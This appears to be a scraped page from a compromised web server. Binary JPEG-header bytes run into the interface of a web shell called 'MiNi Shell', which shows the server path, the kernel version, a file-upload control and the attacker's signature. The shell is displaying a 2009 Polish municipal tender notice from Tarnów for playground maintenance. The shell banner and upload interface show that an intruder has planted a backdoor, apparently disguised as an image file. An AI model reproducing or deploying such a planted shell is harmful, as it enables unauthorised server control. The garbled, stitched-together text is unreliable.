JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090514/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090514/75519-N-2009.html

<p class="kh_header"><b>Tarnów: Bieżące utrzymanie placów zabaw w Tarnowie</b><br>
<b>Numer ogłoszenia: 75519 - 2009; data zamieszczenia: 14.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasta Tarnowa - Urząd Miasta Tarnowa (Wydział Gospodarki Komunalnej i Ochrony Środowiska) , ul. Mickiewicza 2, 33-100 Tarnów, woj. małopolskie, tel. 014 6882869, faks 014 6882876.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bieżące utrzymanie placów zabaw w Tarnowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Wykonywanie kontroli urządzeń na placach zabaw tj.:
1.1. Regularna kontrola placów zabaw wykonywana  3 razy w tygodniu. Obejmuje  sprawdzenie  ogólnego stanu urządzeń, a w szczególności uszkodzeń powstałych w wyniku wandalizmu, prześwitów pomiędzy urządzeniami a nawierzchnią, stan nawierzchni, odsłoniętych fundamentów, niebezpiecznych krawędzi, braku elementów konstrukcyjnych, nadmiernego zużycia urządzeń, kompletność i zwartość konstrukcji.  Kontrolę przeprowadza Wykonawca sporządzając protokół z kontroli. Wynikiem  kontroli powinny być określone czynności konserwacyjne i naprawy takich elementów jak: połączenia śrubowe, nawierzchnia placu zabaw, łożyska, łańcuchy, fundamenty, elementy konstrukcyjne urządzeń, elementy ruchome.
W razie stwierdzenia niebezpiecznego uszkodzenia należy tymczasowo zabezpieczyć 
urządzenie taśmą  przed użytkowaniem zamieszczając informację o uszkodzeniu urządzenia oraz natychmiast podjąć działania w kierunku usunięcia uszkodzenia.
1.2. Funkcjonalna kontrola placów zabaw  wykonywana 1 raz w miesiącu w okresie od 15 czerwca do 30 września i 1 raz na 2 miesiące do 15 kwietnia 2010 r. W czasie kontroli sprawdza się drobiazgowo urządzenia zabawowe  pod kątem zużycia technicznego i funkcjonalności oraz sporządza się protokół z kontroli.
W ramach tej kontroli należy:
- sprawdzić stabilność konstrukcji wszystkich urządzeń znajdujących się na placach zabaw i ich poszczególnych elementów,
- przeprowadzić podstawowe działania naprawcze jak: dokręcenie poluzowanych śrub, uzupełnienie brakujących elementów  i zamówienie odpowiednich części,
- sprawdzić czy nie występują ewentualne uszkodzenia olinowania na wszystkich urządzeniach, na których ono występuje,
- sprawdzić działania części ruchomych urządzeń,
- ocenić czystość urządzeń i terenu placów, 
- ocenić stan terenu placów zabaw - stref bezpieczeństwa i ciągów komunikacyjnych, uzupełnić braki materiałowe i wyrównać powierzchnie,
- ocenić stan  występujących elementów dodatkowych jak tablice informacyjne, ogrodzenia, ławki i innych elementów.
 Kontrolę przeprowadza Wykonawca z osobą posiadającą wykształcenie wyższe politechniczne o specjalności konstrukcyjnej.   
1.3. Coroczna kontrola podstawowa wykonywana w terminie 14 dni od daty podpisania umowy.
Kontrolę przeprowadza komisja w skład której wchodzi w szczególności: przedstawiciel Zamawiającego, osoba posiadająca wykształcenie wyższe techniczne 
o specjalności konstrukcyjnej (wyznaczona przez Wykonawcę do przeprowadzania regularnych i funkcjonalnych kontroli placów zabaw) oraz niezależny specjalista. Komisja sprawdza zużycie urządzeń, stan fundamentów, jakości nawierzchni. Osoby wchodzące w skład Komisji corocznej winny być ubezpieczone od odpowiedzialności cywilnej. O terminie przeprowadzenia kontroli Wykonawca informuje zamawiającego pisemnie.
1.4. Sporządzenie protokołów z kontroli wg wzorów przekazanych przez Zamawiającego.  (Wzory zostaną przekazane Wykonawcy w dniu podpisania umowy).
Protokoły kontroli podlegają zatwierdzeniu przez Zamawiającego.
Sporządzone protokoły z kontroli stanowią podstawę do sporządzenia harmonogramu konserwacji i napraw
Całkowita odpowiedzialność za stan techniczny urządzeń, jak również wynikłe z tego tytułu szkody (również zaistniałe wypadki)  na terenie powierzonym w opiekę spoczywa na Wykonawcy. 
2.Wykonanie napraw, konserwacji i remontów z materiałów, części zamiennych, przegubów i innych elementów urządzeń zabawowych dostarczonych przez Zamawiającego. Wykonawca niezwłocznie zobowiązany jest zgłosić  Zamawiającemu potrzebę dokonania zakupu.  
3.Systematycznie, w zależności od potrzeb, uzupełnianie piasku płukanego w strefach bezpieczeństwa urządzeń zabawowych w ilości do 80 m3. Piasek dostarcza Wykonawca. 
4.Wykonywanie na bieżąco napraw nawierzchni ciągów pieszych, koszy na odpady, ławek oraz innych urządzeń znajdujących  się na terenie  placów zabaw z zachowaniem oryginalnej  formy. 
5.Utrzymanie placów zabaw w zimie tj.:
5.1.W okresie opadów śniegu usuwanie śniegu  i  oblodzenia ze schodów, alejek, chodników przyległych do placów zabaw oraz posypywanie tych miejsc piaskiem. (Dopuszcza się używanie środków chemicznych do zwalczania śliskości na schodach. W żadnym przypadku nie wolno używać żużla). 
5.2. Usuwanie śniegu oraz oblodzenia z ławek i urządzeń zabawowych - po ustaniu opadów śniegu
5.3. W przypadku wystąpienia obfitych opadów śniegu (warstwa śniegu powyżej 10 cm)  otrzepywanie krzewów i żywopłotów ze śniegu - po ustaniu opadów.
6.Prace porządkowe tj.:
6.1.Opróżnianie koszy na odpady komunalne (w przypadku potrzeby), prostowanie przechylonych lub wywróconych koszy na odpady komunalne oraz utrzymywanie ich w stanie czystości i porządku. Łączna ilość koszy na poszczególnych placach zabaw podana jest w załączniku nr 6 dp SIWZ.  
6.2.Usuwanie śmieci, odpadów komunalnych, wyrastającej roślinności 
i błota ze schodów, alejek oraz chodników przyległych do placów zabaw - według potrzeb.
6.3.Zbieranie śmieci z placów zabaw  - według potrzeb.
6.4.Utrzymywanie w stanie czystości (mycie z częstotliwością 1 x w miesiącu w okresie  czerwiec - październik) urządzeń zabawowych, ławek i  słupów lamp oświetleniowych do wysokości 1,5 m,
7.Utrzymanie trawników oraz usługi ogrodnicze tj.:
7.1. Utrzymywanie w wysokim standardzie trawników na placach zabaw należy. Wysoki standard utrzymania placów zabaw polega na wykonywaniu następujących prac:
- nawożenie mineralne azofoską w okresie czerwiec - sierpień  2 razy,
- koszenie trawników (raz w tygodniu w okresie od  01 czerwca - do 15 września,   raz na  2 tygodnie  w okresie od 16 września - 31 października),
- podlewanie w zależności od potrzeb, co najmniej 10 razy w okresie czerwiec -  sierpień,
- usuwanie roślin dwuliściennych - w sposób uzgodniony z zamawiającym,  
7.2.Dokonywanie zgodnie ze sztuką ogrodniczą: nasadzeń (z użyciem materiałów dostarczonych przez Zamawiającego), wykonywanie cięć pielęgnacyjnych i korekcyjnych krzewów i żywopłotów w okresie od kwietnia do września, odchwaszczanie i usuwanie samosiewów w żywopłotach i skupinach krzewów - według potrzeb, wykonywanie wiosennego jednorazowego nawożenia nawozami wieloskładnikowymi (z użyciem materiałów dostarczonych przez Zamawiającego), w okresie wegetacji wykonywanie ochrony chemicznej bylin, kwiatów, krzewów i drzew (z użyciem materiałów dostarczonych przez Zamawiającego), zakładanie trawników w miejscach zadeptanych i zajeżdżonych o powierzchni do 15 arów (materiały - ziemia, trawa , nawozy dostarcza Zamawiający). 
7.3.Utrzymywanie i pielęgnowanie w okresie maj - październik rabat z bylinami      odchwaszczanie rabat na bieżąco, podlewanie w zależności od potrzeb, usuwanie przekwitłych kwiatostanów, dosadzanie ubytków oraz  przekopanie ziemi. 
7.4.Systematyczne, wg potrzeb grabienie trawników z wywozem odpadów komunalnych i liści
7.5.Usuwanie odrostów korzeniowych drzew - wg potrzeb,

Załącznikiem nr 7 SIWZ jest wykaz placów do utrzymania przeznaczonych do utrzymania i mapy (w skali 1:500), na których liniami przerywanymi naniesiono kontury tych terenów oraz określono powierzchnie..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 50.87.00.00-4, 77.30.00.00-3, 90.51.20.00-9, 90.62.00.00-9, 90.63.00.00-2, 90.60.00.00-3, 90.51.10.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.04.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> A. W  przetargu mogą wziąć udział Wykonawcy nie wykluczeni na podstawie art. 24 ust. 1 i 2 ustawy z dnia 29 stycznia 2004 r. Prawo  zamówień publicznych, spełniający warunki określone w art. 22 ust. 1 ustawy. 
W przetargu mogą wziąć udział Wykonawcy, którzy:
1.posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. 
W szczególności wymagane jest, aby Wykonawca posiadał:
-zezwolenie na prowadzenie działalności wydane na podstawie art. 28 ustawy z dnia 27 kwietnia 2001 r. o odpadach  (Dz.U. nr 39, poz.251 z 2007 r. z późn. zm.) w zakresie transportu odpadów 
-zezwolenie na odbieranie odpadów komunalnych od właścicieli nieruchomości, wydane na podstawie art. 7 ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (tekst jednolity Dz. U. Nr 236 z 2005 r. poz. 2008 z póź. zm.),
Ocena spełnienia warunku odbędzie się na podstawie dokumentów oraz oświadczenia - jak w pkt V.6.a,b,c, h,  SIWZ.
2.posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia: 
2.1.W przetargu mogą wziąć udział Wykonawcy, którzy dysponują lub będą dysponować: 
-kosiarką spalinową samojezdną  1 szt.  
-ciągnikiem rolniczym z pługiem do odśnieżania i przyczepą dwuosiową 
-wykaszarkami - co najmniej 2 szt.
-samochodem ciężarowym o nośności do 3,5 tony 
-bazą sprzętową na terenie miasta Tarnowa, a w przypadku nie posiadania bazy, zorganizują bazę sprzętową i zaplecze gospodarcze na terenie miasta Tarnowa, 
2.2.W przetargu mogą wziąć udział Wykonawcy, którzy wykażą, że dysponują lub będą dysponować minimum: 9 osobami
w tym:
-1 osobą posiadająca wykształcenie wyższe techniczne o specjalności konstrukcyjnej (osoba ta będzie odpowiedzialna za prowadzenie regularnych i funkcjonalnych kontroli placów zabaw oraz będzie uczestniczyć w kontroli całorocznej), 
-1 osobą z wykształceniem ogrodniczym,
-2 kierowcami (kierowcą ciągnika rolniczego oraz kierowcą samochodu ciężarowego o nośności do 3,5 tony ),
-1 operatorem kosiarki spalinowej samojezdnej,
-2 osoby do wykonywania czynności technicznych,
-1  osobą, która posiada wykształcenie średnie w zakresie pielęgnacji zieleni na terenach zabytkowych albo odbyła co najmniej 12 miesięczną praktykę zawodową przy pielęgnacji tego rodzaju zabytków (osoba ta będzie wykonywała prace o charakterze technicznym),
-1 osobą, która będzie kierować pracami na placu zabaw w parku zabytkowych   (osoba ta musi posiadać tytuł magistra uzyskany po ukończeniu wyższych studiów, obejmujących wiadomości w tym zakresie oraz odbyła po ukończeniu tych studiów co najmniej 12 - miesięczną praktykę zawodową). Osoba kierująca musi posiadać dyplom ukończenia wyższych studiów obejmujących wiedzę w zakresie prac konserwatorskich lub prac restauratorskich polegających na zabezpieczeniu, uzupełnieniu, rekonstrukcji lub konserwacji parków zabytkowych lub innego rodzaju zorganizowanej zieleni zabytkowej. Osoba ta będzie uczestniczyć w odbiorze prac w każdym miesiącu. Wykonawca musi wskazać osobę (w wykazie osób), która będzie kierowała pracami w parku zabytkowym.
Ocena spełnienia warunku odbędzie się na podstawie oświadczenia i dokumentów  jak w pkt V.6.a, d, e, f,   SIWZ.
3.znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, 
W szczególności wymagane jest aby Wykonawca był ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę: minimum 200 000,00 zł
Ocena spełnienia warunku odbędzie się na podstawie dokumentu oraz oświadczenia jak w  pkt V.6. a, g SIWZ.
4.nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego,
W przetargu mogą wziąć udział Wykonawcy, którzy nie podlegają wykluczeniu na podstawie art. 24 ust. 1 i ust 2 ustawy Prawo zamówień publicznych.
Ocena spełnienia warunku odbędzie się w oparciu o  oświadczenia i dokumenty - jak w pkt  V.6.a - h. SIWZ.
B. Ocena spełnienia warunków zostanie dokonana wg formuły spełnia - nie spełnia. Niespełnienie chociaż jednego warunku skutkować będzie wykluczeniem wykonawców z postępowania i odrzuceniem oferty..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> a).oświadczenia z art. 22 ust. 1 ustawy (wg załącznika nr 2 do SIWZ),
b).aktualny odpis z odpowiedniego rejestru lub aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
c).zezwolenie na prowadzenie działalności na podstawie art. 28 ustawy z dnia 27 kwietnia 2001r. o odpadach ( Dz.U. nr 39, poz.251 z 2007 r. z późn. zm.) w zakresie transportu odpadów,
d).dyplom stwierdzający, że osoba która będzie kierowała pracami w parkach zabytkowych, ukończyła wyższe studia obejmujące wiadomości w zakresie prac konserwatorskich lub prac restauratorskich polegających na zabezpieczeniu, uzupełnieniu, rekonstrukcji lub konserwacji parków zabytkowych lub innego rodzaju zorganizowanej zieleni zabytkowej,
e).wykaz osób, którymi dysponuje lub będzie Wykonawca dysponował, z informacjami na temat kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności (wg zał. nr 5 do SIWZ);
Do wykazu należy dołączyć pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wyżej wymienionym wykazie wykonawca wskazał osoby, którymi będzie dysponował.
f).wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, jakimi dysponuje Wykonawca lub będzie dysponował  (wg zał. nr 4 do SIWZ),
Do wykazu należy dołączyć pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń, jeżeli w wyżej wymienionym wykazie wykonawca wskazał narzędzia i urządzenia, którymi będzie dysponował.
g).polisę lub inny dokument ubezpieczenia, potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności,
h).zezwolenie na odbieranie odpadów komunalnych od właścicieli nieruchomości, wydane na podstawie art. 7 ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (tekst jednolity Dz. U. Nr 236 z 2005 r. poz. 2008 z póź. zm.)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://portal.tarnow.bip-gov.info.pl/bip/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Tarnowa, Wydział Gospodarki Komunalnej i Ochrony Środowiska, 33-100 Tarnów, ul. Goldhammera 3, pok. 201..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.05.2009 godzina 11:00, miejsce: Urząd Miasta Tarnowa, 33-100 Tarnów, ul. Nowa 4, pok. nr 1, Biuro Obsługi Mieszkańców..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com